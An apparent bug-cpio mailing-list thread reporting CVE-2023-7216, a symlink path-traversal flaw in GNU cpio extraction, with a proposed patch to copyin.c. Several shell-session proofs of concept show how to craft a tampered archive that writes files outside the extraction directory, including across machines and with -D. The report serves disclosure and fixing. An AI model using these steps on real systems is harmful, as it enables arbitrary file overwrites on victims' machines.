|
| From: | Nick Tait (he / him) |
| Subject: | Re: Is there a fix for this CVE-2023-7216? |
| Date: | Thu, 29 Feb 2024 16:05:20 -0700 |
Dear cpio maintainer:
This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901
CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
Redhat CVE-2023-7216's Poc can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
Based on my understanding of the POC and analysis of CVE-2023-7216, I constructed two more POC scenarios.
The POC1 can be reproduced using the following methods:
Machine A can use the tampered trav.cpio file to overwrite any file on machine B, which may lead to remote command execution.
``` Machine A
[root@localhostA home]# mkdir testcpio
[root@localhostA home]# ln -sf /tmp/ testcpio/tmp
[root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhostA home]# cd testcpio/
[root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
```
Assume that machine A transfers files to machine B through scp or other file transfer methods. CVE-2023-7216 is triggered when Machine B opens trav.cpio
```Machine B
[root@localhostB home]# cpio -i < trav.cpio
[root@localhostB home]# cat /tmp/trav.txt
TEST Traversal
[root@localhostB home]# cat tmp/trav.txt
TEST Traversal
```
Impact of POC1: This indicates that any cpio archive file that contains symlinks may cause security risks such as path traversal.
The POC2 can be reproduced using the following methods:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# mkdir dirA
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio -D /home/dirA
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat dirA/tmp/trav.txt
TEST Traversal
```
Impact of POC2: When the -D option is used, the cpio file is expected to be decompressed in the specified directory. However, due to the impact of CVE-2023-7216, the file is also generated in the symlink directory, which is not as expected.Like CVE-2015-1197. When the --no-absolute-filenames option is used, the decompressed file should be generated in the current directory instead of the symlink directory.
First of all, I would like to discuss an issue with you, that is, when fixing CVE-2015-1197, the copy_link () function generates symlinks directly through the symlink () function if the --no-absolute-filenames option is not used when processing symlinks. This means that in this case, cpio allows writing files in arbitrary directories through symlinks. Is this what cpio was designed for?
I believe this design is the root cause of CVE-2023-7216. If you think this is a reasonable design, please let me know your reasons and provide a solution for CVE-2023-7216.
If you agree with me that cpio should not allow writing files in arbitrary directories through symlinks,then we can discuss my solution.
In my views, I don't think we can guarantee that the cpio archive does not contain any symlinks. We must handle each symlink as the same as the fix for CVE-2015-1197 during decompression. So I made a patch. I have attached the patch in the mail. If you have a better fix, please let me know.
Look forward to your feedback and suggestions soon.
Best Regards,
PengFrom 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001 From: Peng <2773414454@qq.com> Date: Thu, 29 Feb 2024 17:22:11 +0800 Subject: [PATCH] deafult use symlink_placeholder() to fix Path Traversal --- src/copyin.c | 26 +------------------------- 1 file changed, 1 insertion(+), 25 deletions(-) diff --git a/src/copyin.c b/src/copyin.c index ace0a02..c454313 100644 --- a/src/copyin.c +++ b/src/copyin.c @@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des) link_name = xstrdup (file_hdr->c_tar_linkname); } - if (no_abs_paths_flag) - symlink_placeholder (link_name, file_hdr->c_name, file_hdr); - else - { - res = UMASKED_SYMLINK (link_name, file_hdr->c_name, - file_hdr->c_mode); - if (res < 0 && create_dir_flag) - { - create_all_directories (file_hdr->c_name); - res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode); - } - if (res < 0) - symlink_error (link_name, file_hdr->c_name); - else if (!no_chown_flag) - { - uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid; - gid_t gid = set_group_flag ? set_group : file_hdr->c_gid; - if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM) - chown_error_details (file_hdr->c_name, uid, gid); - } - - if (retain_time_flag) - set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime, - file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW); - } + symlink_placeholder (link_name, file_hdr->c_name, file_hdr); free (link_name); } -- 2.33.0------------------ Original ------------------From: "Peng" <2773414454@qq.com>;Date: Thu, Feb 29, 2024 07:02 PMTo: "bug-cpio"<bug-cpio@gnu.org>;"ntait"<ntait@redhat.com>;"gray"<gray@gnu.org.ua>;"mrehak"<mrehak@redhat.com>;Subject: Re:Is there a fix for this CVE-2023-7216?Dear cpio maintainer:This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.Redhat CVE-2023-7216's Poc can be reproduced using the following method:```[root@localhost home]# mkdir testcpio[root@localhost home]# ln -sf /tmp/ testcpio/tmp[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt[root@localhost home]# cd testcpio/[root@localhost testcpio]# ls | cpio -ov > ../trav.cpiotmptmpYtrav.txt1 block[root@localhost testcpio]# cd ..[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio[root@localhost home]# cpio -i < trav.cpio[root@localhost home]# cat /tmp/trav.txtTEST Traversal[root@localhost home]# cat tmp/trav.txtTEST Traversal```First of all, I would like to confirm with you, do you accept CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio software?If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if there is a better fix, please point it out.CVE-2023-7216 is similar to CVE-2015-1197,Both of them use symlink to cause Path Traversal.The CVE-2015-1197 fix uses symlink_placeholder () to fix a Path Traversal issue in the --no-absolute-filenames scenario.However, CVE-2023-7216 proves that path traversal also exists in other scenarios.So I made a patch to fix CVE-2023-7216, copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.Look forward to your feedback and suggestions soon.Best Regards,Peng------------------ Original ------------------From: "2773414454" <2773414454@qq.com>;Date: Tue, Feb 20, 2024 11:03 AMTo: "bug-cpio"<bug-cpio@gnu.org>;Subject: Is there a fix for this CVE-2023-7216?
| [Prev in Thread] | Current Thread | [Next in Thread] |